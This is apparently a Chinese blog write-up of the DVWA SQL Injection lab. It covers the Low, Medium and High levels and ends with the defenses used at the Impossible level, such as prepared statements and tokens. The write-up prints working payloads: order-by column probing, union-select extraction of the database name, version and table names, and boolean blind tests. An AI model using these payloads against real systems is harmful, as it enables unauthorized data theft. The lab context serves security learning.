dvwa7——SQL Injection

LOW:

f12打开hackbar

一:判断注入类型

输入id=1'报错

闭合单引号 ,页面恢复正常

所以为单引号字符型

二:开始攻击

1.判断列数

复制代码
?id=1' order by 2--+

到3的时候开始报错,所以一共两列

2.爆回显位置

复制代码
?id=-1' union select 2,3--+

3.爆数据库名和版本号

复制代码
?id=-1' union select database(),version()--+

4.爆表名

复制代码
?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5.爆库名

(1)guestbook

(2)users

6.爆guestbook的数据:

MEDIUM:

发现界面变成了这样:

随便提交一个,submit的时候用bp抓包

抓到这些,我们发现这一关的提交形式从get变成了post,格式以红框内为准

继续打开hackbar,发现单引号双引号括号无论闭合不闭合都报错,所以我们判断为数字型

复制代码
id=1 order by 3&Submit=Submit

到3的时候报错,所以一共两列

剩下的表单爆数据不再过多赘述

HIGH:

直接输入前边无正确回显,可以用盲注,参考这一章

复制代码
1' and 1=1#
1' and 1=2#

前者正常,后者无回显,所以是字符型注入,参考这一篇

sqli---labs第八关------布尔盲注_sqli-labs盲注脚本-CSDN博客

IMPOSSIBLE:

优化部分:

复制代码
checkToken($_REQUEST['user_token'], $_SESSION['session_token'], 'index.php');

1.checktoken()

2.mysqli_real_escape_string()转义函数去除反斜杠

3.pdo预处理,参数化查询

4.limit 1限制返回结果

5.generateSessionToken()在文件末尾生成新token供下次使用

6.captcha验证(recaptcha_check_answer())(人机验证)

相关推荐
其实防守也摸鱼23 分钟前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
东北小狐狸-Hellxz38 分钟前
Redis 哨兵搭建+ACL权限控制
数据库·redis
大厂AI实战2 小时前
Token 节约实战:全链路降本 90%+
token·ai agent·ai 编程
研究员子楚2 小时前
GEO行业发展标准体系白皮书V2.0-第09卷 · 适配篇:硅基主权伦理宪章与行业适配宣言
数据库·人工智能·geo
l134062082353 小时前
鸿蒙实战:RDB 数据库设计与 DatabaseService
数据库·华为·harmonyos·鸿蒙系统
山峰哥3 小时前
数据库工程与索引策略实战指南‌
服务器·数据库·sql·oracle·深度优先
谙忆3 小时前
图片版权保护工程实战:明水印、盲水印(DCT隐写)、Referer防盗链与签名URL怎么落地
数据库
KaMeidebaby4 小时前
卡梅德生物技术快报|抗体合成:多肽抗体合成工程化方案:Nsp2 保守肽多抗制备与多维度验证
前端·网络·数据库·人工智能·算法
xfhuangfu4 小时前
19c CDB架构下的数据库启动和停止
数据库·架构
神道君天下4 小时前
填充与积累:积分与面积的可视化
数据库·oracle